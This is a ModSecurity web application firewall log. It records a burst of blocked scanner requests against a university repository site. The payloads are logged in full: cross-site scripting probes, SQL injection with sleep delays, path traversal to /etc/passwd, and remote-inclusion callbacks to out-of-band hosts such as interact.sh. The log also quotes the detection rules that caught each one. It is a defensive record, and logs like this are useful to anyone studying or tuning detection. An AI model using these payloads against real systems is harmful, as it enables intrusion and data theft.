[Tue Aug 29 11:52:01.584523 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bundle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:bundle: ';alert(document.domain);var ok='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/passwordreset"] [unique_id "ZO15ccCo-f0AAAn40yEAAAAW"]
[Tue Aug 29 11:52:02.564462 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:search_title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:search_title: \\x22><img src=x onerror=alert(domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/plugins/jobsearch/"] [unique_id "ZO15csCo-f0AAAnn1-wAAAAe"]
[Tue Aug 29 11:52:02.712147 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/wbm/login/"] [unique_id "ZO15csCo-f0AAAnd3DYAAAAI"]
[Tue Aug 29 11:52:02.826233 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:search_term. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:search_term: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO15csCo-f0AAAni@94AAAAU"]
[Tue Aug 29 11:52:02.826317 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:contactId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:contactId: contactId'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php"] [unique_id "ZO15csCo-f0AAAn40ycAAAAW"]
[Tue Aug 29 11:52:04.904529 2023] [:error] [pid 2557] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0aum1dwr81mjqe.oast.site/ found within TX:1: cjmnijtjmimvgniikdb0aum1dwr81mjqe.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/wp-json/oembed/1.0/proxy"] [unique_id "ZO15dMCo-f0AAAn959cAAAAD"]
[Tue Aug 29 11:52:04.925416 2023] [:error] [pid 2494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ed. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');});}); found within ARGS:ed: foooooooooooooo');});});javascript:alert('document.domain');//g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/Dialog/FileDialog.aspx"] [unique_id "ZO15dMCo-f0AAAm@52gAAAAH"]
[Tue Aug 29 11:52:06.560852 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:secret. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:secret: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/login.php"] [unique_id "ZO15dsCo-f0AAAnTlLIAAAAA"]
[Tue Aug 29 11:52:06.566278 2023] [:error] [pid 2494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:to: /92874';alert(document.domain)//280"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/auth/login"] [unique_id "ZO15dsCo-f0AAAm@52wAAAAH"]
[Tue Aug 29 11:52:06.575967 2023] [:error] [pid 2536] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:page: javascript:alert(document.domain)//"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "repository.unla.ac.id"] [uri "/iwc/idcStateError.iwc"] [unique_id "ZO15dsCo-f0AAAnoOo4AAAAf"]
[Tue Aug 29 11:52:08.593241 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15eMCo-f0AAAfWOLYAAAAL"]
[Tue Aug 29 11:52:08.672139 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fill. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fill: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/checklist/images/checklist-icon.php"] [unique_id "ZO15eMCo-f0AAAn0GbEAAAAa"]
[Tue Aug 29 11:52:09.659607 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: domain)>11 found within ARGS:email: test@test.com\\x22><img src=a onerror=alert(document.domain)>11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/seo/seopanel/login.php"] [unique_id "ZO15ecCo-f0AAAnjjLwAAAAX"]
[Tue Aug 29 11:52:09.711846 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15ecCo-f0AAAnkwfMAAAAY"]
[Tue Aug 29 11:52:10.583161 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15esCo-f0AAAni@@0AAAAU"]
[Tue Aug 29 11:52:11.707820 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15e8Co-f0AAAni@-UAAAAU"]
[Tue Aug 29 11:52:11.710290 2023] [:error] [pid 2562] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:password: admin\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO15e8Co-f0AAAoCWFAAAAAB"]
[Tue Aug 29 11:52:12.594153 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15fMCo-f0AAAnIlokAAAAV"]
[Tue Aug 29 11:52:13.732532 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/propertyfinder/component/jesectionfinder/"] [unique_id "ZO15fcCo-f0AAAnjjMkAAAAX"]
[Tue Aug 29 11:52:13.736469 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15fcCo-f0AAAlUlqUAAAA0"]
[Tue Aug 29 11:52:14.686698 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:1[3]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))-- found within ARGS:1[3]: or 'a'='a') and (select sleep(6))--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/api/v1/components"] [unique_id "ZO15fsCo-f0AAAlIBkwAAAAn"]
[Tue Aug 29 11:52:14.698223 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 3 / [28] [BANNER_AREA_FOOTER2] \\xd0\\x9f\\xd0\\xbe\\xd1\\x81\\xd0\\xb5\\xd1\\x82\\xd0\\xb8\\xd1\\x82\\xd0\\xb5 \\xd0\\xb2\\xd0\\xb2\\xd0\\xbe\\xd0\\xb4\\xd0\\xbd\\xd1\\x83\\xd1\\x8e \\xd0\\xb1\\xd0\\xb5\\xd1\\x81\\xd0\\xbf\\xd0\\xbb\\xd0\\xb0\\xd1\\x82\\xd0\\xbd\\xd1\\x83\\xd1\\x8e \\xd0\\xbb\\xd0\\xb5\\xd0\\xba\\xd1\\x86\\xd0\\xb8\\xd1\\x8e APTOS"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15fsCo-f0AAAnTlNQAAAAA"]
[Tue Aug 29 11:52:14.739498 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/remotereporter/load_logfiles.php"] [unique_id "ZO15fsCo-f0AAAlIBk4AAAAn"]
[Tue Aug 29 11:52:15.620646 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 1 / [84] [MOBILE_HOME] Love Card"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15f8Co-f0AAAn0GdAAAAAa"]
[Tue Aug 29 11:52:16.671150 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 1 / [691] [NEW_INDEX_BANNERS] Trade-in football"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15gMCo-f0AAAfWOM8AAAAL"]
[Tue Aug 29 11:52:16.717633 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../../../../../../../../../../etc"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/download"] [unique_id "ZO15gMCo-f0AAAfWONAAAAAL"]
[Tue Aug 29 11:52:17.545329 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../../../../../../../../../../etc"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/laravel-filemanager/download"] [unique_id "ZO15gcCo-f0AAAfWONEAAAAL"]
[Tue Aug 29 11:52:17.687926 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 5 / [129] [GARMIN_AKCII] Garmin \\xe1\\xee\\xed\\xf3\\xf1 \\xed\\xee\\xe2\\xee\\xf1\\xf2\\xfc \\xe2 \\xe0\\xea\\xf6\\xe8\\xe8"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15gcCo-f0AAAlUlrUAAAA0"]
[Tue Aug 29 11:52:17.744147 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15gcCo-f0AAAfWONIAAAAL"]
[Tue Aug 29 11:52:17.847860 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ContactId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:ContactId: \\x22><script>alert(document.domain);</script><\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php"] [unique_id "ZO15gcCo-f0AAAnn2CUAAAAe"]
[Tue Aug 29 11:52:18.533440 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b found within ARGS:event1: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15gsCo-f0AAAn40zwAAAAW"]
[Tue Aug 29 11:52:19.720538 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b found within ARGS:event1: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15g8Co-f0AAAlUlroAAAA0"]
